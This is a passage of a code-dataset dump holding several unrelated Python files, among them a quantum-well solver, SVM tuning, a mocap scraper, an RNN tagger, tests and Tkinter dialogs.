\"\"\"\r\n all_zeroes = []\r\n s = sign(y)\r\n for i in range(len(y)-1):\r\n if s[i]+s[i+1] == 0:\r\n zero = brentq(Wave_function, x[i], x[i+1])\r\n all_zeroes.append(zero)\r\n return all_zeroes\r\n\r\ndef find_analytic_energies(en):\r\n \"\"\"\r\n Calcule les énergies du puits carre. cf. Griffiths, Introduction to Quantum Mechanics, 1st edition, page 62.\r\n \"\"\"\r\n z = sqrt(2*en)\r\n z0 = sqrt(2*Vo)\r\n z_zeroes = []\r\n f_sym = lambda z: tan(z)-sqrt((z0/z)**2-1) # Equation implicite pour les valeurs symétriques\r\n f_asym = lambda z: -1/tan(z)-sqrt((z0/z)**2-1) # Equation implicite pour les valeurs antisymétriques\r\n \r\n # Pour les fonctions d'onde symétriques\r\n s = sign(f_sym(z))\r\n for i in range(len(s)-1):\r\n if s[i]+s[i+1] == 0:\r\n zero = brentq(f_sym, z[i], z[i+1])\r\n z_zeroes.append(zero)\r\n \r\n # Pour les fonctions d'onde antisymétriques\r\n z_zeroes = []\r\n s = sign(f_asym(z))\r\n for i in range(len(s)-1): # find zeroes of this crazy function\r\n if s[i]+s[i+1] == 0:\r\n zero = brentq(f_asym, z[i], z[i+1])\r\n z_zeroes.append(zero)\r\n\r\n# =============================================================================\r\n# --- Fonction principale (main loop) ------------------------------------------\r\n# =============================================================================\r\n\r\ndef main():\r\n \"\"\"\r\n L'idée est de scanner toutes les énergies entre 0 et 100Vo, et de chercher celles dont la fonction d'onde vaut 0 loin à l'intérieur du puits (en x=b).\r\n \"\"\" \r\n \r\n en = linspace(0.1, Vo, 100) # Energies que l'on va investiguer pour trouver les états propres\r\n psi_b = [] # Vecteur contenant les valeurs en x=b\r\n \r\n for e1 in en:\r\n psi_b.append(Wave_function(e1)) \r\n E_zeroes = find_all_zeroes(en, psi_b) # On ne sélectionne que les énergies telles que la fonction d'onde vaut 0 en x=b\r\n \r\n # =============================================================================\r\n # --- Création de la figure ------------------------------------------\r\n # =============================================================================\r\n f, ax = subplots(2, sharex=True) # La figure sera composée de deux sous-figures\r\n \r\n f.suptitle(\"Particule dans un puits fini\", fontsize=22)\r\n \r\n ## Energies\r\n \r\n ax[1].set_title('Energies propres', fontsize=18)\r\n ax[1].set_ylim(-0.2,1.5)\r\n ax[1].set_ylabel(r'$\\frac{E}{V_0}$',rotation='horizontal',fontsize=24)\r\n ax[1].set_xlim(-2,2)\r\n ax[1].set_xlabel(r'$\\frac{x}{a}$',fontsize=24)\r\n \r\n for E in E_zeroes:\r\n ax[1].plot(linspace(-1,1,50), E*ones(50)/Vo, label=\"E = %.2f\"%E)\r\n \r\n #Dessin du puits\r\n l1=ax[1].plot(linspace(-2,-1,50),ones(50),-1*ones(50),linspace(0,1,50),linspace(-1,1,50),0*ones(50)/Vo,1*ones(50),linspace(0,1,50),linspace(1,2,50),ones(50))\r\n plt.setp(l1, linewidth=2, color='k')\r\n \r\n #Pointillés\r\n l2=ax[1].plot(-1*ones(50),linspace(-0.5,1.5,50),1*ones(50),linspace(-0.5,1.5,50))\r\n plt.setp(l2, linewidth=0.5, color='k',linestyle='--')\r\n\r\n ## Fonctions d'onde\r\n \r\n for E in E_zeroes:\r\n Wave_function(E)\r\n ax[0].plot(x, psi[:,0], label=\"E = %.2f\"%E)\r\n\r\n ax[0].set_title(\"Fonctions d'onde propres\",fontsize=18)\r\n ax[0].set_ylim(-1.2,1.5)\r\n ax[0].set_ylabel(r'$\\varphi(x)$', rotation='horizontal', fontsize = 15)\r\n \r\n # Pointillés\r\n l3=ax[0].plot(-1*ones(50),linspace(-300,300,50),1*ones(50),linspace(-300,300,50),zorder=20)\r\n plt.setp(l3, linewidth=1, color='k',linestyle='--')\r\n\r\n #Ligne 0\r\n l4=ax[0].plot(linspace(-2,2,2),[0]*2,zorder=30)\r\n plt.setp(l4, linewidth=0.5, color='k', linestyle='-')\r\n\r\n\r\nmain()\r\nshow()\r\n#input()\r\n\r\n\r\n\r\n","sub_path":"Lecons_jules/Python/FonctionOnde_PuitsQuantique.py","file_name":"FonctionOnde_PuitsQuantique.py","file_ext":"py","file_size_in_byte":7405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"296763156","text":"import pandas as pd\nimport numpy as np\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\nfrom sklearn import preprocessing\nfrom sklearn.decomposition import PCA\nfrom sklearn.manifold import Isomap\n\nx = pd.read_csv('Datasets/parkinsons.data')\ny = x['status'].copy()\nx.drop(labels=['name', 'status'], axis=1, inplace=True)\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=7)\nsvc = SVC()\nsvc.fit(x_train, y_train)\nscore = svc.score(x_test, y_test)\nprint('Score: %f' % score)\n\nscaler = preprocessing.StandardScaler()\nscaler.fit(x_train)\nx_train = scaler.transform(x_train)\nx_test = scaler.transform(x_test)\n\nfor n_components in range(4, 7):\n for n_neighbors in range(2, 6):\n # model = PCA(n_components=n_components)\n model = Isomap(n_neighbors=n_neighbors, n_components=n_components)\n model.fit(x_train)\n x_train_pca = model.transform(x_train)\n x_test_pca = model.transform(x_test)\n\n best_score = 0\n for c in np.arange(0.05, 2.05, 0.05):\n for gamma in np.arange(0.001, 0.101, 0.001):\n svc = SVC(kernel='rbf', C=c, gamma=gamma)\n svc.fit(x_train_pca, y_train)\n score = svc.score(x_test_pca, y_test)\n if score > best_score:\n best_score = score\n\n print('Best score: %f' % best_score)\n","sub_path":"Module6/assignment3.py","file_name":"assignment3.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"607714203","text":"import web\n\nfrom web.template import ALLOWED_AST_NODES\nALLOWED_AST_NODES.append('Constant')\n\nurls = (\n '/alumnos?', 'application.controllers.alumnos.Alumnos' #el simbolo ? inidca que recibira variables en la URL\n)\napp = web.application(urls, globals())\n\n#render = web.template.render('templates/') #dice que la carpeta de las paginas web sera templates\n\nif __name__ == \"__main__\":\n web.config.debug = True\n app.run()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"43556017","text":"# class Roman:\n# def __init__(self,number):\n# self.number=number\n# def convert(self):\n# pass\nclass Romandigit:\n def convertroman(self,no):\n digit=[1000,900,500,400,100,90,50,40,10,9,5,4,1]\n romanNo=['M','CM','D','CD','C','XC','L','XL','X','IX','V','IV','I']\n romandigit=''\n k=0\n while no>0:\n for _ in range(no//digit[k]):\n romandigit+=romanNo[k]\n no-=digit[k]\n k+=1\n return romandigit\n\nprint(Romandigit().convertroman(34))\nprint(Romandigit().convertroman(120))\nprint(Romandigit().convertroman(4))\nprint(Romandigit().convertroman(1847))\n\nclass Sozumuz:\n word=''\n # def __init__(self,word):\n # self.word=word\n def get_string(self):\n self.word=input(\"soz daxil edin:\")\n def print_string(self):\n print(self.word.upper())\nstring1=Sozumuz()\nstring1.get_string()\nstring1.print_string()\n\nclass Pow:\n # def __init__(self,x,n):\n # self.x=x\n # self.n=n\n \n def pow(self,x,n):\n # self.x=x\n # self.n=n\n return x**n\n\npow1=Pow()\nprint(pow1.pow(5,2))\n\nclass Reverse:\n words=\"\"\n def reverse_words(self,):\n self.words = input(\"metn daxil edin: \")\n mylist=self.words.split()\n mylist.reverse()\n for i in mylist:\n print(i,end=\" \")\n print()\n\nobject1=Reverse()\n\nobject1.reverse_words()\n","sub_path":"01-Warmup/classroomtask1.py","file_name":"classroomtask1.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"414009752","text":"import requests\nimport warnings\nfrom html.parser import HTMLParser\n\nclass CMUHTMLSubjectParser(HTMLParser):\n \n def __init__(self):\n super().__init__()\n self.reset_all()\n \n self.subject_number = 1\n self.data_idx = 0\n self.data_ignore = [\n '\\'', '\\n\\n', 'tvd', 'c3d', \n 'mpg', 'Animated', 'Feedback'\n ]\n \n def reset_all(self):\n self.reset()\n self.master = {}\n self.tr_enabled = False\n self.data_enabled = False\n self.data_zero = None\n self.cur_url = None\n self.data = ['' for _ in range(4)]\n self.list_comp = self.data[:] \n self.data_idx = 0\n \n def set_subject(self, subject_num):\n self.subject_number = subject_num\n self.master[\"Subject\"] = subject_num\n \n def handle_starttag(self, tag, attrs):\n if tag == 'tr': \n self.tr_enabled = True\n \n if not self.tr_enabled:\n return\n \n if tag == 'a':\n if len(attrs) == 1:\n url = attrs[0][1]\n toks = url.split('.')\n if toks[-1] == 'asf':\n self.master['asf'] = url.encode('utf-8')\n \n self.cur_url = attrs[0][1]\n \n def handle_data(self, data):\n if self.tr_enabled:\n self.data_zero = data\n if isinstance(self.data_zero, str):\n if self.data_zero.isnumeric():\n self.data_enabled = True\n \n if not self.data_enabled:\n return \n \n if data in self.data_ignore:\n return\n \n if self.data_idx == 2:\n self.data[self.data_idx] = self.cur_url\n else:\n self.data[self.data_idx] = data\n \n self.data_idx += 1\n \n def handle_endtag(self, tag):\n if tag == 'tr':\n self.tr_enabled = False\n if self.data != self.list_comp: \n d = {\n 'Category': None,\n 'Description': self.data[1],\n 'amc': self.data[2].encode('utf-8'),\n 'FrameRate': int(self.data[3])\n }\n \n trial = 'Trial{0}'.format(self.data[0])\n self.master[trial] = d\n \n self.data = self.list_comp[:]\n self.data_enbaled = False\n self.data_idx = 0\n \n\nclass CMUScanner(object):\n \n def __init__(self):\n self.html_parser = CMUHTMLSubjectParser()\n self.base_url = 'http://mocap.cs.cmu.edu/search.php?subjectnumber={0}'\n self.allowed_subjects = [snum for snum in range(1, 145)]\n \n def __get_url_content(self, num):\n url = self.base_url.format(num)\n resp = requests.get(url, allow_redirects=True)\n \n cont_t = resp.headers.get('content-type')\n assert cont_t == 'text/html', \"Invalid content {0}\".format(cont)\n \n return str(resp.content)\n \n def __parse_html(self, html):\n self.html_parser.feed(html)\n return dict(self.html_parser.master)\n \n def scan_cmu(self, subject_number=1):\n if subject_number not in self.allowed_subjects:\n warnings.warn(\n \"Subject number not allowed, using default (1)\"\n )\n subject_number = 1\n \n self.html_parser.reset_all()\n \n self.html_parser.set_subject(subject_number)\n cont = self.__get_url_content(subject_number)\n return self.__parse_html(cont)\n","sub_path":"pymoco/cmuscanner.py","file_name":"cmuscanner.py","file_ext":"py","file_size_in_byte":3681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"128007437","text":"import numpy as np\r\nimport scipy.io as sio\r\n\r\nf1 = open('word_list_unstem4.txt','r')\r\nwords_str = f1.readline()\r\nwords_list = words_str.split()\r\nfeature_length = len(words_list)\r\nf1.close()\r\n\r\n## 用10000个词汇来表示25000条负极的影评句子\r\nf2 = open('token_data_neg.txt','r')\r\nmatrix_doc_neg = np.zeros((25000,feature_length))\r\nfor line in range(25000):\r\n sentance = f2.readline()\r\n sentance_list = sentance.split()\r\n for i in range(len(sentance_list)):\r\n for j in range(len(words_list)):\r\n if sentance_list[i] == words_list[j]:\r\n matrix_doc_neg[line][j] = 1\r\n break\r\n\r\nf2.close()\r\n\r\n## 用XX个词汇来表示25000条正极的影评句子\r\nf3 = open('token_data_pos.txt','r')\r\nmatrix_doc_pos = np.zeros((25000,feature_length))\r\nfor line in range(25000):\r\n sentance = f3.readline()\r\n sentance_list = sentance.split()\r\n for i in range(len(sentance_list)):\r\n for j in range(len(words_list)):\r\n if sentance_list[i] == words_list[j]:\r\n matrix_doc_pos[line][j] = 1\r\n break\r\n\r\nf3.close()\r\n\r\n## partioning 分training set & test set\r\n# 25000 neg & 25000 pos\r\n# 按7:3分割,17500*2 : 7500*2\r\nk1 = np.random.permutation(25000)\r\nk2 = np.random.permutation(25000)\r\ntrain_neg = np.zeros((17500,feature_length))\r\ntest_neg = np.zeros((7500,feature_length))\r\nfor i in range(17500):\r\n train_neg[i] = matrix_doc_neg[k1[i]]\r\nfor i in range(7500):\r\n test_neg[i] = matrix_doc_neg[17500 + k1[i + 17500]]\r\n\r\ntrain_pos = np.zeros((17500,feature_length))\r\ntest_pos = np.zeros((7500,feature_length))\r\nfor i in range(17500):\r\n train_pos[i] = matrix_doc_pos[k1[i]]\r\nfor i in range(7500):\r\n test_pos[i] = matrix_doc_pos[17500 + k1[i + 17500]]\r\n# training set, 标记分两类,第一类为positive, 第二类为negative, 数量相等\r\ntrain_set = np.zeros(17500 * 2, feature_length)\r\ntrain_set[0:17500] = train_neg\r\ntrain_set[17500:] = train_pos\r\nk3 = np.random.permutation(17500 * 2)\r\ntrain_x = np.zeros(17500 * 2, feature_length)\r\nfor i in range(17500*2):\r\n train_x[i] = train_set[k3[i]]\r\ntrain_y = np.zeros(17500*2, 2)\r\nfor i in range(17500*2):\r\n if k3[i] >= 17500:\r\n train_y[i][0] = 1\r\n else:\r\n train_y[i][1] = 1\r\n \r\n# test set,标记分两类,第一类为positive, 第二类为negative, 数量相等\r\ntest_set = np.zeros(7500 * 2, feature_length)\r\ntest_set[0:7500] = test_neg\r\ntest_set[7500:] = test_pos\r\nk4 = np.random.permutation(7500 * 2)\r\ntest_x = np.zeros(7500 * 2, feature_length)\r\nfor i in range(7500*2):\r\n test_x[i] = test_set[k4[i]]\r\ntest_y = np.zeros(7500*2, 2)\r\nfor i in range(7500*2):\r\n if k4[i] >= 7500:\r\n test_y[i][0] = 1\r\n else:\r\n test_y[i][1] = 1\r\n\r\n\r\nsio.savemat('savelongdata.mat',{'train_x':train_x, 'train_y':train_y, 'test_x':test_x, 'test_y':test_y})\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Sentiment-Analysis/彬彬/bag_of_word2.0/bow_train_test.py","file_name":"bow_train_test.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"647967161","text":"import pytest\nfrom csp import (\n FunctionConstraint,\n ConstraintNotAFunction,\n ConstraintMissingArguments,\n ConstraintUnexpectedArguments\n)\n\n\ndef constraint_1(a):\n return a**2 < 4\n\n\ndef constraint_2(a, b):\n return a*2 < b\n\n\ndef test_ConstraintNotAFunction():\n fake_constraint = 'this is a string'\n\n with pytest.raises(ConstraintNotAFunction):\n FunctionConstraint(fake_constraint, ['a'])\n\n\ndef test_constraint_1():\n\n FunctionConstraint(constraint_1, ['a'])\n\n with pytest.raises(ConstraintMissingArguments):\n FunctionConstraint(constraint_1, ['b'])\n\n with pytest.raises(ConstraintUnexpectedArguments):\n FunctionConstraint(constraint_1, ['a', 'b'])\n\n\ndef test_constraint_2():\n\n FunctionConstraint(constraint_2, ['a', 'b'])\n FunctionConstraint(constraint_2, ['b', 'a'])\n\n with pytest.raises(ConstraintMissingArguments):\n # Missing 1 argument\n FunctionConstraint(constraint_2, ['a'])\n\n with pytest.raises(ConstraintMissingArguments):\n # Missing 1 argument\n FunctionConstraint(constraint_2, ['b'])\n\n with pytest.raises(ConstraintMissingArguments):\n # Missing 2 argument\n FunctionConstraint(constraint_2, ['c'])\n\n with pytest.raises(ConstraintUnexpectedArguments):\n FunctionConstraint(constraint_2, ['a', 'b', 'c'])\n\n with pytest.raises(ConstraintUnexpectedArguments):\n FunctionConstraint(constraint_2, ['c', 'b', 'a'])\n\n\ndef test_constraint_2_satisfied():\n c = FunctionConstraint(constraint_2, ['a', 'b'])\n assignment_1 = {\n 'a': 2,\n 'b': 5\n }\n \n assert c.satisfied(assignment_1)\n\n assignment_2 = {\n 'a': 2,\n 'b': 4\n }\n \n assert not c.satisfied(assignment_2)","sub_path":"tests/test_FunctionConstraint.py","file_name":"test_FunctionConstraint.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"479912484","text":"# -*- coding: utf-8 -*-\n\nfrom google.appengine.ext import webapp\nfrom google.appengine.dist import use_library\nfrom google.appengine.api import users\n\n\nclass ApplicationHandler(webapp.RequestHandler):\n \"\"\"Base class for all handlers.\n\n Add there methods/helpers that can be used by all handlers,\n such as greetings, logout messages, etc.\"\"\"\n def CommonValues(self):\n values = {}\n values[\"tabs\"] = [\n dict(text=\"Acceuil\", url=\"/\",rel=\"\"),\n dict(text=\"Classements\", url=\"/ranking\",rel=\"\"),\n dict(text=\"Questions\", url=\"/questions\",rel=\"\"),\n ]\n if not users.get_current_user():\n values[\"tabs\"].append(dict(text=\"Login\",\n url=users.create_login_url(\"/\"),rel=\"#overlay\"))\n else:\n values[\"tabs\"].append(dict(text=\"Mon profil\",\n url=\"/profile\"))\n values[\"tabs\"].append(dict(text=\"Déconnecter\",\n url=users.create_logout_url(\"/\")))\n return values\n\n","sub_path":"Documents/Boulot/sunutechgroup/Xadeck-Senegaal-Challenge-1f594f3/handlers/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"650170645","text":"import concurrent\nimport json\nimport sqlite3\nfrom pprint import pprint as pp\n\nimport pytest\n\nfrom modules.commands.data_update.data_update import DataUpdater\nfrom modules.db_config.db_config import DBConfig\n\n\n@pytest.fixture(scope='module')\ndef database():\n \"\"\" Setup of the database before tests \"\"\"\n\n db = DBConfig(\n db_name='/home/przemek/PycharmProjects/movies_db/modules/commands/data_update/test_data_updater/resources/movies_test.sqlite') # Creating new db\n with db.conn:\n db.c.execute(\"\"\"CREATE TABLE IF NOT EXISTS MOVIES (\n ID INTEGER PRIMARY KEY,\n TITLE text,\n YEAR integer, \n RUNTIME text, \n GENRE text, \n DIRECTOR text, \n CAST text, \n WRITER text, \n LANGUAGE text, \n COUNTRY text, \n AWARDS text, \n IMDb_Rating float, \n IMDb_votes integer, \n BOX_OFFICE integer,\n UNIQUE(TITLE));\n \"\"\")\n\n try:\n db.c.execute(\n \"\"\"INSERT INTO MOVIES(TITLE) VALUES ('The Shawshank Redemption')\"\"\")\n db.c.execute(\"\"\"INSERT INTO MOVIES(TITLE) VALUES ('Memento')\"\"\")\n db.c.execute(\"\"\"INSERT INTO MOVIES(TITLE) VALUES ('In Bruges')\"\"\")\n db.c.execute(\"\"\"INSERT INTO MOVIES(TITLE) VALUES ('Gods')\"\"\")\n db.c.execute(\"\"\"INSERT INTO MOVIES(TITLE) VALUES ('The Godfather')\"\"\")\n db.c.execute(\"\"\"INSERT INTO MOVIES(TITLE) VALUES ('Niemategonapewno')\"\"\")\n except sqlite3.IntegrityError:\n pass\n\n yield db\n\n # Teardown - deleting the tested table\n db.c.execute(\"DROP TABLE MOVIES\")\n\n\n@pytest.fixture(scope='module')\ndef data_updater(database):\n \"\"\"\n Setup the data updater class before tests\n :param database:\n :return:\n \"\"\"\n\n # Setup\n data_updater = DataUpdater(db=database)\n yield data_updater\n\n # Teardown\n del data_updater\n\n\n@pytest.fixture(scope='module')\ndef empty_titles(data_updater, database):\n \"\"\"\n Setup the empty titles before tests\n :param data_updater:\n :param database:\n :return:\n \"\"\"\n\n # Setup\n empty_titles = database.execute_statement(data_updater.sql_empty_titles_statement)\n yield empty_titles\n\n # Teardown\n del empty_titles\n\n\n@pytest.fixture(scope='module')\ndef downloaded_data(data_updater, empty_titles):\n \"\"\"\n Setup the downloaded data before tests\n :param empty_titles:\n :param data_updater:\n :return:\n \"\"\"\n\n # Setup\n with concurrent.futures.ThreadPoolExecutor() as executor:\n downloaded_data = executor.map(data_updater.download_data, empty_titles)\n\n yield downloaded_data\n\n # Teardown\n del downloaded_data\n\n\ndef test_empty_titles(empty_titles):\n \"\"\"\n Testing getting the list of empty titles\n :param empty_titles:\n :return:\n \"\"\"\n\n # Testing the results of getting list of empty titles\n assert empty_titles[0]['Title'] == 'The Shawshank Redemption'\n assert empty_titles[1]['Title'] == 'Memento'\n assert empty_titles[2]['Title'] == 'In Bruges'\n assert empty_titles[3]['Title'] == 'Gods'\n assert empty_titles[4]['Title'] == 'The Godfather'\n\n\ndef test_download_data(downloaded_data):\n \"\"\"\n Testing downloading the data using API\n :param downloaded_data:\n :return:\n \"\"\"\n\n # Checking json data corectness\n # Ignore assertion error if imdbVotes doesn't match\n with open(\n '/home/przemek/PycharmProjects/movies_db/modules/commands/data_update/test_data_updater/resources/json_movies.json',\n 'r') as correct_file:\n correct_json = json.load(correct_file)\n assert correct_json == next(downloaded_data)[0]\n\n\ndef test_update_data(data_updater, downloaded_data):\n \"\"\"\n Test inserting the data to db\n :param data_updater:\n :param downloaded_data:\n :return:\n \"\"\"\n results = data_updater.update_data(downloaded_data)\n assert results == [{'Title': 'Memento', 'Status': 'Updated'},\n {'Title': 'In Bruges', 'Status': 'Updated'},\n {'Title': 'Gods', 'Status': 'Updated'},\n {'Title': 'The Godfather', 'Status': 'Updated'},\n {'Error': 'Movie not found!', 'Response': 'False'}]\n","sub_path":"modules/commands/data_update/test_data_updater/test_data_updater.py","file_name":"test_data_updater.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"138077211","text":"\"\"\" Tests for yatsm.config_parser\n\"\"\"\nimport os\n\nfrom yatsm import config_parser\n\n\ndef test_get_envvars():\n truth = {\n 'YATSM': {\n 'algo': 'CCDC',\n 'jobno': '1'\n },\n 'dataset': {\n 'dataset': '/tmp/images.csv',\n 'cache': '/tmp/cache'\n }\n }\n d = {\n 'YATSM': {\n 'algo': 'CCDC',\n 'jobno': '$JOBNO'\n },\n 'dataset': {\n 'dataset': '$ROOTDIR/images.csv',\n 'cache': '$ROOTDIR/cache'\n }\n }\n envvars = {\n 'JOBNO': '1',\n 'ROOTDIR': '/tmp'\n }\n # Backup and replace environment\n backup = os.environ.copy()\n for k in envvars:\n os.environ[k] = envvars[k]\n\n expanded = config_parser.expand_envvars(d)\n\n os.environ.update(backup)\n\n assert truth == expanded\n","sub_path":"tests/test_config_parser.py","file_name":"test_config_parser.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"24136145","text":"#python tutorial08.py ../../data/wiki-en-train.norm_pos ../../data/wiki-en-test.norm result.txt\nimport numpy as np\nimport sys\nfrom collections import defaultdict\n\nclass RNN:\n def __init__(self):\n self.word_ids = defaultdict(lambda:len(self.word_ids))\n self.lab_ids = defaultdict(lambda:len(self.lab_ids))\n self.word_with_lab = []\n self.word_lab_vec = []\n self.nodes = 5\n\n def count_features(self, input_file):\n with open (input_file, \"r\", encoding = \"utf-8\") as input_file:\n for line in input_file:\n for word_with_lab in line.strip().split(\" \"):\n word, lab = word_with_lab.split(\"_\")\n self.word_ids[word]\n self.lab_ids[lab]\n\n def create_net(self):\n self.net = []\n w_rx = np.random.rand(self.nodes, len(self.word_ids))-0.5\n self.net.append(w_rx)\n w_rh = np.random.rand(self.nodes, self.nodes)-0.5\n self.net.append(w_rh)\n b_r = np.random.rand(self.nodes)-0.5\n self.net.append(b_r)\n w_oh = np.random.rand(len(self.lab_ids), self.nodes)-0.5 \n self.net.append(w_oh)\n b_o = np.random.rand(len(self.lab_ids))-0.5\n self.net.append(b_o)\n\n #w_rx = net[0]\n #w_rh = net[1]\n #w_oh = net[3]\n #b_r = net[2]\n #b_o = net[4]\n def forward(self, x):\n h = [0] * len(x)\n p = [0] * len(x)\n y = [0] * len(x)\n for t in range(len(x)):\n if t > 0:\n h[t] = np.tanh(np.dot(self.net[0], x[t]) + np.dot(self.net[1], h[t-1]) + self.net[2])\n else:\n h[t] = np.tanh(np.dot(self.net[0], x[t]) + self.net[2])\n p[t] = self.softmax(np.dot(self.net[3], h[t]) + self.net[4])\n y[t] = np.argmax(p[t])\n return h, p, y\n \n def softmax(self, x):\n a= np.sum(np.exp(x))\n return np.exp(x)/a\n\n def create_onehot(self, id, size):\n vec = np.zeros(size)\n vec[id] = 1\n return vec\n \n def find_best(self,p):\n y=0\n for i in range(len(p)):\n if p[i] > p[y]:\n y = i\n return y\n\n def gradient(self, x, h, p, y_d):\n Δw_rx = np.zeros_like(self.net[0])\n Δw_rh = np.zeros_like(self.net[1])\n Δb_r = np.zeros_like(self.net[2])\n Δw_oh = np.zeros_like(self.net[3])\n Δb_o = np.zeros_like(self.net[4])\n deltar_d = np.zeros(len(self.net[2]))\n\n for t in range(len(x))[::-1]:\n p_d = y_d\n deltao_d = p_d[t] - p[t]\n Δw_oh += np.outer(deltao_d, h[t])\n Δb_o += deltao_d\n deltar = np.dot(deltar_d, self.net[1])+np.dot(deltao_d,self.net[3])\n deltar_d = deltar * (1 - h[t] ** 2)\n Δw_rx += np.outer( deltar_d, x[t])\n Δb_r += deltar_d\n if t != 0:\n Δw_rh += np.outer(deltar_d, h[t-1])\n return [Δw_rx, Δw_rh, Δb_r, Δw_oh, Δb_o]\n\n def create_features(self, x):\n word_vec = []\n lab_vec = []\n words_labs = x.split(\" \")\n for word_lab in words_labs:\n word, lab = word_lab.split(\"_\")\n word_vec.append(self.create_onehot(self.word_ids[word], len(self.word_ids)))\n lab_vec.append(self.create_onehot(self.lab_ids[lab], len(self.lab_ids)))\n return [word_vec, lab_vec]\n \n def create_features_test(self, x):\n word_vec = []\n words = x.split(\" \")\n for word in words:\n if word in self.word_ids:\n word_vec.append(self.create_onehot(self.word_ids[word], len(self.word_ids)))\n return word_vec\n\n def train(self, input_file1,lr,iter):\n self.count_features(input_file1)\n self.create_net()\n \n for i in range(iter):\n input_file = open (input_file1, \"r\", encoding = \"utf-8\")\n print(i) \n for line in input_file:\n word_vec, lab_vec = self.create_features(line.strip())\n h, p, _ = self.forward(word_vec)\n Δ = self.gradient(word_vec, h, p, lab_vec)\n self.update_weights(Δ, lr)\n input_file.close() \n \n def update_weights(self, Δ, rate):\n Δw_rx, Δw_rh, Δb_r, Δw_oh, Δb_o = Δ\n self.net[0] += rate * Δw_rx\n self.net[1] += rate * Δw_rh\n self.net[2] += rate * Δb_r\n self.net[3] += rate * Δw_oh\n self.net[4] += rate * Δb_o\n \n def test(self, input_file, output_file):\n with open(input_file, \"r\", encoding = \"utf-8\") as input_file,\\\n open(output_file, \"w\", encoding = \"utf-8\") as output_file:\n for line in input_file:\n a = []\n word_vec = self.create_features_test(line.strip())\n _, _, y = self.forward(word_vec)\n for k in range(len(y)):\n for i,j in self.lab_ids.items():\n if j == y[k]:\n a.append(str(i))\n output_file.write(f\"{i} \")\n output_file.write(\"\\n\")\n \nif __name__ == \"__main__\":\n rnn = RNN()\n rnn.train(sys.argv[1],0.01,3)\n rnn.test(sys.argv[2], sys.argv[3])","sub_path":"kobayashi/tutorial08/tutorial08.py","file_name":"tutorial08.py","file_ext":"py","file_size_in_byte":5232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"267159519","text":"from tkinter import *\nimport sys\n\nclass BaseDialog( Toplevel ):\n \"\"\"\n Helper base class for dialogs used in the UI.\n \"\"\"\n\n def __init__(self, parent, title = None, buttons=\"\"):\n \"\"\"\n Constructor\n \"\"\"\n Toplevel.__init__( self, parent )\n self.transient(parent)\n\n if title:\n self.title(title)\n\n self.parent = parent\n self.result = None\n body = Frame(self)\n self.initial_focus = self.body(body)\n body.pack(padx=5, pady=5)\n self.buttonbox(buttons)\n self.grab_set()\n if not self.initial_focus:\n self.initial_focus = self\n self.protocol(\"WM_DELETE_WINDOW\", self.cancel)\n self.geometry(\"+%d+%d\" % (parent.winfo_rootx() + 50,\n parent.winfo_rooty() + 50))\n self.initial_focus.focus_set()\n self.wait_window(self)\n\n def body(self, master):\n # create dialog body. return widget that should have\n # initial focus. this method should be overridden\n pass\n\n def buttonbox(self, buttons):\n # add standard button box. override if you don't want the\n # standard buttons\n box = Frame(self)\n w = Button(box, text=\"OK\", width=40, command=self.ok, default=ACTIVE)\n w.pack(side=LEFT, padx=5, pady=5)\n self.bind(\"\", self.ok)\n box.pack()\n\n def ok(self, event=None):\n if not self.validate():\n self.initial_focus.focus_set() # put focus back\n return\n\n self.withdraw()\n self.update_idletasks()\n self.apply()\n self.cancel()\n\n def cancel(self, event=None):\n # put focus back to the parent window\n self.parent.focus_set()\n self.destroy()\n\n def validate(self):\n return 1 # override\n\n def apply(self):\n pass # override\n\nclass SetupDialog( BaseDialog ):\n \"\"\"\n This class is used to create the setup dialog.\n \"\"\"\n def body(self, master):\n Label(master, justify=LEFT, text=\"Project name: \" ).grid(row=0, column=0)\n Label(master, justify=LEFT, text=\"Name\").grid(row=0, column=1)\n self.e1 = Entry(master)\n self.e1.grid(row=1, column=1)\n return self.e1 # initial focus\n\n def apply(self):\n return 0\n\n\nclass ProjGenDialog( object ):\n \"\"\"\n This class is used to create a simplified user interface for running the regression test suite.\n \"\"\"\n \n def __init__(self, bin_path ):\n \"\"\"\n Constructs the dialog, you can define which executable shal be used.\n @param bin_path [in] Path to assimp binary.\n \"\"\"\n self.width=60\n\n\n def setup(self):\n d = SetupDialog( self.root )\n\n\n def generate(self):\n pass\n \n def quit(self):\n sys.exit(0)\n\n def initUi(self):\n # create the frame with buttons\n self.root = Tk()\n self.root.title( \"OSRE project generator V0.1\")\n self.setup = Button( self.root, text=\"Setup project\", command=self.setup, width = self.width )\n self.generate = Button(self.root, text=\"Generate project\", command=self.generate, width=self.width)\n self.quit = Button( self.root, text=\"Quit\", command=self.quit, width = self.width )\n self.setup.grid(row=0, column=0, sticky=W+E )\n self.generate.grid(row=1, column=0, sticky=W+E)\n self.quit.grid(row=1, column=0, sticky=W + E)\n self.root.mainloop()\n\ndef main():\n project_name = \"\"\n project_dir = \"./\"\n 